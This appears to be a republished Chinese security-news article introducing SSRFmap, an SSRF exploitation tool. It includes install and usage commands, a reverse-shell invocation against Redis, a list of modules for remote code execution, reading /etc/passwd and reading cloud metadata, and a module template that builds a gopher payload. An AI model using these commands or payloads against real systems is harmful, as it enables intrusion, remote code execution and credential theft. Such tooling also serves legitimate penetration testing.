
 5 years ago
source link: https://www.freebuf.com/sectool/197353.html?amp%3Butm_medium=referral
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SSRF,即 服务器端请求伪造 ,很多网络犯罪分子都会利用SSRF来攻击或入侵网络服务。今天我们给大家介绍的这款工具名叫SSRFmap,它可以寻找并利用目标网络服务中的SSRF漏洞。



SSRFmap:【 GitHub传送门



git clone https://github.com/swisskyrepo/SSRFmap

cd SSRFmap/

python3 ssrfmap.py

usage:ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [--lhost LHOST] [--lportLPORT] [--level LEVEL]

optional arguments:

-h, --help    show this help message and exit

-r REQFILE    SSRF Request file

-p PARAM      SSRF Parameter to target

-m MODULES    SSRF Modules to enable

-l HANDLER    Start an handler for a reverseshell

--lhost LHOST LHOST reverse shell

--lport LPORT LPORT reverse shell

--level [LEVEL]  Level of test to perform (1-5, default: 1)



#Launch a portscan on localhost and read default files
python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan
#Triggering a reverse shell on a Redis
python ssrfmap.py -r data/request.txt -p url -m redis --lhost= --lport=4242-l 4242
# -lcreate a listener for reverse shell on the specified port
#--lhost and --lport work like in Metasploit, these values are used to create areverse shell payload
#--level : ability to tweak payloads in order to bypass some IDS/WAF. e.g: -> [::] -> 0000: -> ...


FLASK_APP=data/example.pyflask run &
python ssrfmap.py -r data/request.txt -p url -m readfiles



模块名称 模块描述 fastcgi FastCGI RCE redis Redis RCE github Github 企业版 RCE < 2.8.7 zabbix Zabbix RCE mysql MySQL 命令执行 docker Docker Infoleaks API smtp SMTP 邮件发送 Portscan 主机端口扫描 networkscan HTTP Ping sweep readfiles 文件读取,例如 /etc/passwd alibaba 从供应商处读取文件 ( 例如 : meta-data, user-data) aws 从供应商处读取文件 ( 例如 : meta-data, user-data) gce 从供应商处读取文件 ( 例如 : meta-data, user-data) digitalocean 从供应商处读取文件 ( 例如 : meta-data, user-data) socksproxy SOCKS4 代理 smbhash 通过 UNC Path 破解 SMB 认证 tomcat 爆破 Tomcat Manager


from core.utils import *

import logging

name          = "servicename inlowercase"

description   = "ServiceName RCE - What does itdo"

author        = "Name or pseudo of theauthor"

documentation= [" http://link_to_a_research ", " http://another_link "]

class exploit():


SERVER_PORT = "4242"

def __init__(self, requester, args):

logging.info("Module '{}' launched!".format(name))

# Handle args for reverse shell

if args.lhost == None: self.SERVER_HOST= input("Server Host:")

else:                  self.SERVER_HOST = args.lhost

if args.lport == None: self.SERVER_PORT= input("Server Port:")

else:                  self.SERVER_PORT = args.lport

# Data for the service

# Using a generator to create the hostlist

# Edit the following ip if you need totarget something else

gen_host =gen_ip_list("", args.level)

for ip in gen_host:

port = "6379"

data ="*1%0d%0a$8%0d%0aflus[...]%0aquit%0d%0a"

payload = wrapper_gopher(data, ip ,port)

# Handle args for reverse shell

payload = payload.replace("SERVER_HOST",self.SERVER_HOST)

payload =payload.replace("SERVER_PORT", self.SERVER_PORT)

# Send the payload

r =requester.do_request(args.param, payload)

*参考来源: SSRFmap ,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

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